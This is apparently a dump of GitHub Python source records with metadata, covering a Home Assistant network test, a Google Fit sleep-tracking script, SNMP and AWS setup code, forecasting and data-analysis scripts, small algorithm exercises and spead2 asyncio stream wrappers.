CoreState.RUNNING\n await asyncio.sleep(0)\n 
ha_ws_client.async_send_command.reset_mock()\n\n assert \"connectivity_check\" not in coresys.resolution.unsupported\n assert coresys.host.network.connectivity is True\n\n network_manager_service.emit_properties_changed({\"ConnectivityCheckEnabled\": False})\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is None\n await asyncio.sleep(0)\n ha_ws_client.async_send_command.assert_any_call(\n {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": None},\n },\n }\n )\n assert \"connectivity_check\" in coresys.resolution.unsupported\n\n ha_ws_client.async_send_command.reset_mock()\n network_manager_service.emit_properties_changed({\"ConnectivityCheckEnabled\": True})\n await network_manager_service.ping()\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is True\n await asyncio.sleep(0)\n ha_ws_client.async_send_command.assert_any_call(\n {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": True},\n },\n }\n )\n assert \"connectivity_check\" not in coresys.resolution.unsupported\n","repo_name":"home-assistant/supervisor","sub_path":"tests/host/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","stars":1510,"dataset":"github-code","pt":"3"} +{"seq_id":"29635079585","text":"\"\"\"\r\nCS 2302\r\nEmilio Ramirez\r\nLab 6\r\nDiego Aguirre, Manoj Saha\r\nLast Date Modified: December 14th, 2018\r\nPurpose: Implement Kruskal's Algorithm and Topoligic sort\r\n\"\"\"\r\n\r\n\r\nfrom LAB6sup import topological_sort\r\nfrom Graph_AM import GraphAM\r\n\r\n\r\n\r\ndef main():\r\n\r\n Graph = GraphAM(6, True)\r\n Graph.add_edge(5,2, weight= 1)\r\n Graph.add_edge(2,1, weight= 1)\r\n Graph.add_edge(4,3, weight= 1)\r\n Graph.add_edge(3,2, weight= 1)\r\n Graph.add_edge(3,0, weight= 1) \r\n \r\n print(\"The result of topological sort on the given graph is\", topological_sort(Graph))\r\n\r\nmain()","repo_name":"ejramirez5/lab6a","sub_path":"LAB6.py","file_name":"LAB6.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3310322805","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import UserMixin\nfrom datetime import datetime,timezone,timedelta\nimport calendar, time\nfrom flask import request\nimport json\nimport requests\nimport ast\nfrom . 
import gFit\nfrom .app import create_app\nfrom .models import db,User\n\napp = create_app()\napp.app_context().push()\n\n####################### calling of refresh token function ###############################\n\ndef new_access_token(refresh_token):\n data = {\n 'grant_type': 'refresh_token',\n 'client_id': os.environ.get('CLIENT_ID'),\n 'client_secret': os.environ.get('CLIENT_SECRET'),\n 'refresh_token': refresh_token\n }\n\n response = requests.post('https://oauth2.googleapis.com/token', data=data)\n # print(response.json())\n resp = response.json()\n new_refresh_token = refresh_token\n if 'refresh_token' in resp:\n new_refresh_token = resp['refresh_token']\n return resp[\"access_token\"] , new_refresh_token\n \n########################end of refresh token functn ##############################\n\ndef toggle_light(nodemcu, state):\n vars = nodemcu['vars']\n vars['LED_STATUS'] = state\n headers = {\n 'Content-Type': 'application/json'\n }\n payload = \"{\\\"LED_STATUS\\\":\"+str(state)+\"}\"\n resp = requests.patch(url=nodemcu['url'], headers=headers, data=payload)\n # print(resp.json())\n return nodemcu\n\ndef send_time(nodemcu,state):\n dt_now1 = datetime.now(tz=timezone(timedelta(hours=5.5)))\n dt_now = dt_now1.strftime(\"%Y-%m-%d %H:%M:%S%z\")\n headers = {\n 'Content-Type': 'application/json'\n }\n payload = \"{\\\"%s\\\":\\\"%s\\\"}\" % (dt_now, state)\n url = \"%s/%s.json\" % (nodemcu['url'][:-5], state)\n resp = requests.patch(url=url, headers=headers, data=payload)\n # print(resp.json())\n\n######################## main_user_functn ###############################\n\n\n\ndef start():\n\n all_user=User.query.all()\n for i in all_user:\n if not i.active:\n continue\n \n try:\n # print(\"i.nodemcu\" , i.nodemcu)\n # print(\"i.token_created_at\" , i.token_created_at)\n # print(\"i.tokens\" , i.tokens)\n # tok = ast.literal_eval(i.tokens)\n # print(\"refresh_token\" , tok[\"refresh_token\"])\n # i.tokens = str(tok)\n # db.session.add(i)\n # db.session.commit()\n # print(\"access_token\" , tok[\"access_token\"])\n # print(\"refresh_token\" , tok[\"refresh_token\"])\n\n # if i.active:\n # continue\n tok = ast.literal_eval(i.tokens)\n ctime = int(calendar.timegm(time.strptime(str(i.token_created_at), '%Y-%m-%d %H:%M:%S.%f')))\n # ctime = int(calendar.timegm((i.token_created_at).utctimetuple()))\n # ctime = (int)((i.token_created_at).timestamp())\n # ctime is in sec\n # if atleat 15 min left to expire\n # print(int(round(time.time())))\n # print(ctime)\n # if i.active:\n # continue\n if int(round(time.time())) - ctime < 2700 :\n # print('access_token not expired')\n access_token = tok[\"access_token\"]\n else :\n # print('getting new access_token')\n access_token, refresh_token = new_access_token(tok[\"refresh_token\"])\n i.token_created_at = datetime.utcnow()\n tok[\"access_token\"] = access_token\n if refresh_token != tok[\"refresh_token\"]:\n tok[\"refresh_token\"] = refresh_token\n\n # print(\"access_token\" , access_token)\n # print(i.token_created_at)\n\n endTimeMillis = int(round(time.time() * 1000))\n startTimeMillis = endTimeMillis - 3600000\n # if gFit.is_sleeping(1584157920000, 1584157920001, access_token):\n if gFit.is_sleeping(startTimeMillis, endTimeMillis, access_token):\n print(\"sleeping\")\n i.nodemcu = str( toggle_light(ast.literal_eval(i.nodemcu), 0) )\n send_time(ast.literal_eval(i.nodemcu), 'sleeping')\n else:\n print(\"Not sleeping\")\n i.nodemcu = str( toggle_light(ast.literal_eval(i.nodemcu), 1) )\n send_time(ast.literal_eval(i.nodemcu), 'awake')\n \n i.tokens = 
str(tok)\n db.session.add(i)\n db.session.commit()\n\n # except:\n # continue\n except Exception as e:\n print(e)\n \n\nif __name__=='__main__':\n while (True):\n start()\n time.sleep(1800)\n","repo_name":"krishu1501/bettersleep","sub_path":"main/keep_checking.py","file_name":"keep_checking.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33789106875","text":"import sys, itertools\ndata = sys.stdin.read()\n\nfor line in data.splitlines()[1:]:\n i, j, k = line.split(',')\n permutations = list(itertools.permutations(list(i)))\n s = sorted([int(''.join(permutation)) for permutation in permutations])\n num1, num2 = str(s[int(j) - 1]), str(s[int(k) - 1])\n \n length = len(list(i))\n count = 0\n for i in range(length):\n if num1[i] == num2[i]: count += 1\n print(f'{count}A{length - count}B')","repo_name":"rtashklzx47277/Python_practice","sub_path":"NTUB/10622.py","file_name":"10622.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13395541599","text":"import unittest\nfrom fun_with_collections import set_membership as membership\n\n\nclass MyTestCase(unittest.TestCase):\n def test_in_set_true(self): # pass input\n my_set = {1, 2, 3, 4}\n self.assertEqual(membership.in_set(my_set), 'Set is true')\n\n def test_in_set_false(self):\n my_set = {1, 2, 3, 4}\n self.assertNotEqual(membership.in_set(my_set), 'Set is false')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"billster2006/Module7","sub_path":"test_collections/test_set_membership.py","file_name":"test_set_membership.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4146493003","text":"# %%\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport plotly\nimport pandas as pd\n\nfrom greykite.common.constants import TIME_COL, VALUE_COL\nfrom greykite.framework.benchmark.data_loader_ts import DataLoader\nfrom greykite.framework.input.univariate_time_series import UnivariateTimeSeries\n\nfrom greykite.framework.templates.autogen.forecast_config import \\\n EvaluationPeriodParam, ForecastConfig, \\\n MetadataParam, ModelComponentsParam\n\nfrom greykite.framework.templates.forecaster import Forecaster\nfrom greykite.framework.utils.result_summary import summarize_grid_search_results\n\nwarnings.filterwarnings('ignore')\n\n\n# %%\ndata_loader = DataLoader()\nagg_func = {\n 'count': 'sum'\n}\n\ndf = data_loader.load_bikesharing(\n agg_freq='weekly',\n agg_func=agg_func\n)\n\ndf.drop(df.head(1).index, inplace=True)\ndf.drop(df.tail(1).index, inplace=True)\ndf.reset_index(inplace=True)\n\n# %% \nts = UnivariateTimeSeries()\nts.load_data(\n df=df,\n time_col='ts',\n value_col='count',\n freq='W-MON'\n)\n\nprint(ts.df.head())\n# %%\nfig = ts.plot()\nplotly.io.show(fig)\n\n# %%\nfig = ts.plot_quantiles_and_overlays(\n groupby_time_feature='month',\n show_mean=True,\n show_quantiles=False,\n show_overlays=True,\n center_values=True,\n overlay_label_time_feature='year',\n overlay_style={\n 'line': {\n 'width': 1},\n 'opacity': 0.5\n },\n xlabel='month',\n ylabel=ts.original_value_col,\n title='Yearly seasonality by year'\n)\n\nplotly.io.show(fig)\n# %%\nfig = ts.plot_quantiles_and_overlays(\n groupby_time_feature='woy',\n show_mean=True,\n show_quantiles=False,\n show_overlays=True,\n center_values=True,\n 
overlay_label_time_feature='year',\n overlay_style={\n 'line': {\n 'width': 1},\n 'opacity': 0.5\n },\n xlabel='week of year',\n ylabel=ts.original_value_col,\n title='Yearly seasonality by year(centered)'\n)\n\nplotly.io.show(fig)\n# %% fit greykite model\nforecast_horizon = 4\ntime_col, value_col = TIME_COL, VALUE_COL\n\nmetadata = MetadataParam(\n time_col=time_col,\n value_col=value_col,\n freq='W-MON'\n)\n\n# %%\ncv_min_train_periods = 52 * 2\n# Let CV use most recent splits for cross validation.\ncv_use_most_recent_splits = True\ncv_max_splits = 6\n\nevaluation_period = EvaluationPeriodParam(\n test_horizon=forecast_horizon,\n cv_horizon=forecast_horizon,\n periods_between_train_test=0,\n cv_min_train_periods=cv_min_train_periods,\n cv_expanding_window=True,\n cv_use_most_recent_splits=cv_use_most_recent_splits,\n cv_periods_between_splits=None,\n cv_periods_between_train_test=0,\n cv_max_splits=cv_max_splits\n)\n\n# %%\n\n\ndef get_model_result_summary(result):\n model = result.model[-1]\n backtest = result.backtest\n grid_search = result.grid_search\n\n # print(model.summary())\n\n cv_results = summarize_grid_search_results(\n grid_search=grid_search,\n decimals=2,\n cv_report_metrics=None,\n column_order=[\n 'rank', 'mean_test', 'split_test', 'mean_train', 'split_train',\n 'mean_fit_time', 'mean_score_time', 'params'\n ]\n )\n\n backtest_eval = defaultdict(list)\n for metric, value in backtest.train_evaluation.items():\n backtest_eval[metric].append(value)\n backtest_eval[metric].append(backtest.test_evaluation[metric])\n metrics = pd.DataFrame(\n backtest_eval,\n index=['train', 'test']\n ).T\n print(f'CV Results:\\n {cv_results.transpose()}')\n print(f'Train/Test evaluation: \\n {metrics}')\n\n return cv_results, metrics\n\n\n# %%\nautoregression = None\nextra_pred_cols = [\n 'ct1', 'ct_sqrt', 'ct1:C(month, levels=list(range(1, 13)))'\n]\n\nseasonality = {\n 'yearly_seasonality': 25,\n 'quarterly_seasonality': 0,\n 'monthly_seasonality': 0,\n 'weekly_seasonality': 0,\n 'daily_seasonality': 0\n}\nchangepoints = {\n 'changepoints_dict': {\n 'method': 'auto',\n 'resample_freq': '7D',\n 'regularization_strength': 0.5,\n 'potential_changepoint_distance': '14D',\n 'no_changepoint_distance_from_end': '60D',\n 'yearly_seasonality_order': 25,\n 'yearly_seasonality_change_freq': None\n },\n 'seasonality_changepoints_dict': None\n}\n\nevents = {\n 'holiday_lookup_countries': []\n}\n\ngrowth = {\n 'growth_term': None\n}\n\ncustom = {\n 'feature_sets_enabled': False,\n 'fit_algorithm_dict': {\n 'fit_algorithm': 'ridge'\n },\n 'extra_pred_cols': extra_pred_cols\n}\n\nmodel_components = ModelComponentsParam(\n seasonality=seasonality,\n changepoints=changepoints,\n events=events,\n growth=growth,\n custom=custom\n)\n\n# %%\nforecast_config = ForecastConfig(\n metadata_param = metadata,\n forecast_horizon=forecast_horizon,\n coverage=0.95,\n evaluation_period_param=evaluation_period,\n model_components_param=model_components\n)\n\nforecaster = Forecaster()\nresult = forecaster.run_forecast_config(\n df=ts.df,\n config=forecast_config\n)\n# %%\nget_model_result_summary(result)\n\n# %%\nfig = result.backtest.plot()\nplotly.io.show(fig)\n\n# %% \nfig = result.forecast.plot()\nplotly.io.show(fig)\n\n# %%\nfig = result.forecast.plot_components()\nplotly.io.show(fig)\n# 
%%\n","repo_name":"8-u8/learning_Python","sub_path":"greykite_trial/src/greykite_trial.py","file_name":"greykite_trial.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14928776962","text":"import torch\n\nfrom src import _PATH_DATA\n\n\nclass dataset:\n def __init__(self, data, target):\n self.data = data\n self.target = target\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n X = self.data[idx]\n y = self.target[idx]\n\n return X, y\n\n\ndef load_data():\n train_images = torch.load(_PATH_DATA + \"/processed/train_images.pt\")\n train_labels = torch.load(_PATH_DATA + \"/processed/train_labels.pt\")\n test_images = torch.load(_PATH_DATA + \"/processed/test_images.pt\")\n test_labels = torch.load(_PATH_DATA + \"/processed/test_labels.pt\")\n\n return dataset(train_images, train_labels), dataset(test_images, test_labels)\n","repo_name":"RasmusJuul/MLOps_personal","sub_path":"src/data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"856410656","text":"#Your task is to create a Python script that analyzes the records to calculate each of the following:\n #The total number of months included in the dataset\n #The net total amount of \"Profit/Losses\" over the entire period\n #The average of the changes in \"Profit/Losses\" over the entire period\n #The greatest increase in profits (date and amount) over the entire period\n #The greatest decrease in losses (date and amount) over the entire period\n\n\n# Import dependencies\nimport os\nimport csv\n\n# Define variables\ndate = []\nprofit_loss_changes = []\n\n\ntotal_months = 0\ntotal_net_pl = 0\nprevious_month_pl=0\ncurrent_month_pl=0\nprofit_loss_change=0\n\n# Change directory to the directory of current python script\nos.chdir(os.path.dirname(__file__))\n\n# Path to collect data from the Resources folder\nbudget_data_csv_path = os.path.join(\"Resources\", \"budget_data.csv\")\n\n\n# Open and read csv\nwith open(budget_data_csv_path, newline=\"\") as csvfile:\n\n csv_reader = csv.reader(csvfile, delimiter=\",\")\n \n # Read the header row first\n csv_header = next(csvfile)\n\n for row in csv_reader: \n \n # Count of months\n total_months=total_months + 1\n\n # Calculate net total profit/loss over the time period\n current_month_pl= int(row[1])\n total_net_pl+= current_month_pl\n \n if (total_months==1):\n previous_month_pl=current_month_pl\n continue\n\n else:\n profit_loss_change=current_month_pl-previous_month_pl\n\n #Append each change in profit/loss for each month to profit_loss_changes[] \n profit_loss_changes.append(profit_loss_change)\n\n #Get the current month\"s p/l to be previous month's pl for the next loop\n previous_month_pl=current_month_pl\n\n #Append each month to total months to find out the month of greatest profit and loss\n date.append(row[0])\n\n #Calculate total monhtly changes of p/l and get the average of it\n total_profit_loss_changes=sum(profit_loss_changes)\n avarage_monthly_pl_changes=round(total_profit_loss_changes/(total_months-1),2)\n\n #Greatest change in profits and greatest change in losses over the time period\n greatest_increase=max(profit_loss_changes)\n greatest_decrease=min(profit_loss_changes)\n\n #Find out the date of the greatest change in profits and greatest decrease in losses\n 
date_greatest_increase=date[profit_loss_changes.index(greatest_increase)]\n date_greatest_decrease=date[profit_loss_changes.index(greatest_decrease)]\n\n \n \n\n# -->> Print the analysis to the terminal\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {total_months}\")\nprint(f\"Total: ${total_net_pl}\")\nprint(f\"Average Change: ${avarage_monthly_pl_changes}\")\nprint(f\"Greatest Increase in Profits: {date_greatest_increase} (${greatest_increase})\")\nprint(f\"Greatest Decreasde in Losses: {date_greatest_decrease} (${greatest_decrease})\")\n\n\n#Export a text file with the results\n\nwith open (\"financial_analysis.text\", \"w\") as text:\n\n text.write(\"Financial Analysis\\n\")\n text.write(\"----------------------------------\\n\")\n text.write(f\"Total Months: {total_months}\\n\")\n text.write(f\"Total: ${total_net_pl}\\n\")\n text.write(f\"Average Change: ${avarage_monthly_pl_changes}\\n\")\n text.write(f\"Greatest Increase in Profits: {date_greatest_increase} (${greatest_increase})\\n\")\n text.write(f\"Greatest Decreasde in Losses: {date_greatest_decrease} (${greatest_decrease})\\n\")\n\n","repo_name":"Serapbasaran/python-challenge","sub_path":"Pybank/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10782623636","text":"#!/usr/bin/python\r\n# _*_ coding:utf-8 _*_\r\n__author__ = \"dqz\"\r\n#让用户输入的备份的路径和存放的路径\r\nyuan = input(\"请输入备份的路径:\")\r\nmubiao = input(\"请输入目标路径:\")\r\n\r\n#定义个函数\r\ndef bf(x,y):\r\n s = open(yuan,'r')\r\n d = open(mubiao,'w')\r\n for i in s:\r\n d.write(i)\r\n d.flush()\r\n s.close()\r\n d.close()\r\n\r\n#调用函数\r\nbf(x=yuan,y=mubiao)\r\n","repo_name":"dqzboy/PyScript","sub_path":"文件拷贝.py","file_name":"文件拷贝.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"31221407563","text":"#!/usr/bin/env python\n\nfrom lib.config import AppConfig\nfrom lib.snmp import SNMP\nimport logging\n\nimport socket\nimport requests\nimport json\nimport traceback\n\n\ndef get_microtic(snmp, data):\n data[\"distribution\"] = \"RouterOS\"\n data[\"version\"] = snmp.get(\"1.3.6.1.4.1.14988.1.1.4.4.0\")\n\n\nvendor_specific = {\n \"1.3.6.1.4.1.14988.1\": get_microtic\n}\n\n\ndef try_device(conf, log, device):\n try:\n log.info(\"Querying %s.\" % (device[\"hostname\"], ))\n\n snmp = SNMP(device[\"version\"], device[\"community\"], device[\"hostname\"], int(device[\"port\"]))\n\n data = {\n \"id\": device[\"id\"],\n \"hostname\": snmp.get(\"1.3.6.1.2.1.1.5.0\"),\n \"kernel\": snmp.get(\"1.3.6.1.2.1.1.1.0\"),\n \"uptime\": snmp.get(\"1.3.6.1.2.1.1.3.0\") / 100,\n }\n\n vendor = snmp.get(\"1.3.6.1.2.1.1.2.0\")\n\n if vendor in vendor_specific:\n vendor_specific[vendor](snmp, data)\n\n r = requests.put(\"%s/collect.php\" % (conf.get(\"server_address\"), ), data=json.dumps(data), verify=conf.get(\"server_verify_ssl\", True))\n\n if r.status_code != 200:\n log.error(r.text)\n else:\n log.debug(r.text)\n\n except Exception as e:\n log.error(str(e))\n log.debug(traceback.format_exc())\n\n\ndef main():\n conf = AppConfig([\n (\"server_address\", str, \"Address of SYSmon server.\"),\n (\"server_verify_ssl\", bool, \"Verify SYSmon server's SSL certificate?\")\n ])\n\n log = logging.getLogger()\n log.info(\"SYSmon SNMP agent is starting.\")\n\n try:\n server_address = conf.get(\"server_address\")\n if server_address is 
None:\n raise Exception(\"No server address configured.\")\n\n hostname = socket.gethostname()\n url = \"%shosts/list/%s\" % (server_address, hostname)\n r = requests.get(url, verify=conf.get(\"server_verify_ssl\", True))\n devices = json.loads(r.text)\n\n for device in devices:\n try_device(conf, log, device)\n\n except Exception as e:\n log.error(str(e))\n log.debug(traceback.format_exc())\n\n log.info(\"SYSmon SNMP agent finished.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"niximor/sysmon","sub_path":"collector/src/sysmon-snmp.py","file_name":"sysmon-snmp.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6310197267","text":"def add(i):\n global last\n last += 1\n heap[last] = i\n a = last\n while a // 2:\n if heap[a] < heap[a // 2]:\n heap[a], heap[a // 2] = heap[a // 2], heap[a]\n a = a // 2\n else:\n break\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n arr = list(map(int, input().split()))\n heap = [0] * (N + 1)\n last = 0\n for i in arr:\n add(i)\n x = N // 2\n summ = 0\n while x:\n summ += heap[x]\n x //= 2\n print(f'#{tc} {summ}')","repo_name":"judong93/TIL","sub_path":"algorithm/0824~/0826/이진힙.py","file_name":"이진힙.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24658291923","text":"from .is_a_function import isAFunction\nfrom .is_a_number import isANumber\nfrom .is_a_numpy_array import isANumpyArray\nfrom .is_a_pandas_dataframe import isAPandasDataFrame\nfrom .is_a_pandas_series import isAPandasSeries\nfrom .is_a_tensor import isATensor\n\n\ndef dropNaN(x):\n if isATensor(x):\n if isAPandasDataFrame(x) or isAPandasSeries(x):\n x = x.values.tolist()\n\n if isANumpyArray(x):\n x = x.tolist()\n\n out = []\n\n for value in x:\n temp = dropNaN(value)\n\n if temp is not None:\n out.append(temp)\n\n return out\n\n elif type(x) == dict:\n out = {}\n\n for key in x.keys():\n value = x[key]\n temp = dropNaN(value)\n\n if temp is not None:\n out[key] = temp\n\n return out\n\n else:\n if isAFunction(x):\n return None\n\n try:\n return dropNaN(x.__dict__)\n\n except:\n pass\n\n if isANumber(x):\n return x\n\n return None\n\n","repo_name":"jrc03c/pyds","sub_path":"pyds/drop_nan.py","file_name":"drop_nan.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31139559007","text":"from random import randint\n\nclass Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n self.sort(nums,0,len(nums)-1)\n return nums[k-1]\n \n def sort(self, nums,left,right):\n if left < right:\n pivot = self.partition(nums, left, right)\n self.sort(nums,left,pivot-1)\n self.sort(nums,pivot+1,right)\n \n def partition(self, nums, left, right):\n pivot = randint(left, right)\n nums[left], nums[pivot] = nums[pivot], nums[left]\n i = left+1\n pivot = nums[left]\n \n for j in range(left+1, right+1):\n if nums[j] > pivot:\n nums[j], nums[i] = nums[i], nums[j]\n i+=1\n \n position = i-1\n nums[left],nums[position] = nums[position],nums[left]\n \n return position\n 
","repo_name":"jw122/exercises","sub_path":"sorting-searching/kth-largest-element-in-an-array.py","file_name":"kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18669144027","text":"import yaml\nfrom boto3 import resource as botorsc\nfrom boto3 import client as botoclient\n\n\nwith open('../credentials.yml', 'r') as cfile:\n cfg = yaml.safe_load(cfile)\n\naws_region = cfg['aws_region']\naws_key = cfg['aws_key']\naws_access = cfg['aws_access']\ndepartments: list = ['dev', 'test', 'srt']\n\n# Create Client for DynamoDB\ndynamo_client = botoclient(\n 'dynamodb',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Resource for DynamoDB\ndynamo_rsc = botorsc(\n 'dynamodb',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Client for S3\ns3_client = botoclient(\n 's3',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n\n# Create Resource for S3\ns3_rsc = botorsc(\n 's3',\n aws_access_key_id=aws_key,\n aws_secret_access_key=aws_access,\n region_name=aws_region\n)\n","repo_name":"n-raghu/aws-nuggets","sub_path":"s3-lambda/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33099302103","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN_GROUPS = 3\nGROUP_DATA_FILE_FORMAT = 'grpdata%i.csv'\nVALID_DATA_COLUMN = 1\n\ngroup_means = np.full(N_GROUPS, np.nan)\nfor i_group in range(N_GROUPS):\n file_name = GROUP_DATA_FILE_FORMAT % i_group\n all_group_data = np.loadtxt(file_name, delimiter=',')\n group_data = all_group_data[:, VALID_DATA_COLUMN]\n group_means[i_group] = np.mean(group_data)\n\nplt.plot(group_means)\nplt.xlabel('Group')\nplt.ylabel('Mean value')\nplt.show()","repo_name":"gmarkkula/ResearchCodingWorkshop","sub_path":"code examples/my_script_3.py","file_name":"my_script_3.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2085872372","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 31 14:40:14 2021\n\n@author: md703\n\"\"\"\n\nfrom mcx_ultrasound_model import MCX\n\n# parameters\nsessionID = \"test_bc_eric_smallijv_mus_lb\"\n\n# initialize\nsimulator = MCX(sessionID)\n\n# run forward mcx\nsimulator.run()","repo_name":"syuys/ijv_2","sub_path":"20211026_newmodel_size_test/run_baseline_simulation.py","file_name":"run_baseline_simulation.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14069744369","text":"import asyncio\n\n\nfrom spead2._spead2.send import UdpStreamAsyncio as _UdpStreamAsyncio\nfrom spead2._spead2.send import TcpStreamAsyncio as _TcpStreamAsyncio\nfrom spead2._spead2.send import InprocStreamAsyncio as _InprocStreamAsyncio\n\n\ndef _wrap_class(name, base_class):\n class Wrapped(base_class):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._active = 0\n self._last_queued_future = None\n\n def _async_send(self, call):\n future = asyncio.Future()\n loop = asyncio.get_event_loop()\n\n def callback(exc, bytes_transferred):\n if exc is not None:\n future.set_exception(exc)\n 
else:\n future.set_result(bytes_transferred)\n self._active -= 1\n if self._active == 0:\n loop.remove_reader(self.fd)\n self._last_queued_future = None # Purely to free the memory\n queued = call(callback)\n if self._active == 0:\n loop.add_reader(self.fd, self.process_callbacks)\n self._active += 1\n if queued:\n self._last_queued_future = future\n return future\n\n def async_send_heap(self, heap, cnt=-1, substream_index=0):\n \"\"\"Send a heap asynchronously. Note that this is *not* a coroutine:\n it returns a future. Adding the heap to the queue is done\n synchronously, to ensure proper ordering.\n\n Parameters\n ----------\n heap : :py:class:`spead2.send.Heap`\n Heap to send\n cnt : int, optional\n Heap cnt to send (defaults to auto-incrementing)\n substream_index : int, optional\n Substream on which to send the heap\n \"\"\"\n meth = super().async_send_heap\n return self._async_send(\n lambda callback: meth(heap, callback, cnt, substream_index))\n\n def async_send_heaps(self, heaps, mode):\n meth = super().async_send_heaps\n return self._async_send(\n lambda callback: meth(heaps, callback, mode))\n\n async def async_flush(self):\n \"\"\"Asynchronously wait for all enqueued heaps to be sent. Note that\n this only waits for heaps passed to :meth:`async_send_heap` prior to\n this call, not ones added while waiting.\"\"\"\n future = self._last_queued_future\n if future is not None:\n await asyncio.wait([future])\n\n Wrapped.__name__ = name\n return Wrapped\n\n\nUdpStream = _wrap_class('UdpStream', _UdpStreamAsyncio)\nUdpStream.__doc__ = \\\n \"\"\"SPEAD over UDP with asynchronous sends. The other constructors\n defined for :py:class:`spead2.send.UdpStream` are also applicable here.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n endpoints : List[Tuple[str, int]]\n Peer endpoints (one per substreams).\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n buffer_size : int\n Socket buffer size. A warning is logged if this size cannot be set due\n to OS limits.\n \"\"\"\n\n_TcpStreamBase = _wrap_class('TcpStream', _TcpStreamAsyncio)\n\n\nclass TcpStream(_TcpStreamBase):\n \"\"\"SPEAD over TCP with asynchronous connect and sends.\n\n Most users will use :py:meth:`connect` to asynchronously create a stream.\n The constructor should only be used if you wish to provide your own socket\n and take care of connecting yourself.\n\n Parameters\n ----------\n thread_pool : :py:class:`spead2.ThreadPool`\n Thread pool handling the I/O\n socket : :py:class:`socket.socket`\n TCP/IP Socket that is already connected to the remote end\n config : :py:class:`spead2.send.StreamConfig`\n Stream configuration\n \"\"\"\n\n @classmethod\n async def connect(cls, *args, **kwargs):\n \"\"\"Open a connection.\n\n The arguments are the same as for the constructor of\n :py:class:`spead2.send.TcpStream`.\n \"\"\"\n future = asyncio.Future()\n loop = asyncio.get_event_loop()\n\n def callback(arg):\n if not future.done():\n if isinstance(arg, Exception):\n loop.call_soon_threadsafe(future.set_exception, arg)\n else:\n loop.call_soon_threadsafe(future.set_result, arg)\n\n stream = cls(callback, *args, **kwargs)\n await future\n return stream\n\n\nInprocStream = _wrap_class('InprocStream', _InprocStreamAsyncio)\nInprocStream.__doc__ = \\\n \"\"\"SPEAD over reliable in-process transport.\n\n .. note::\n\n Data may still be lost if the maximum number of in-flight heaps (set\n in the stream config) is exceeded. 
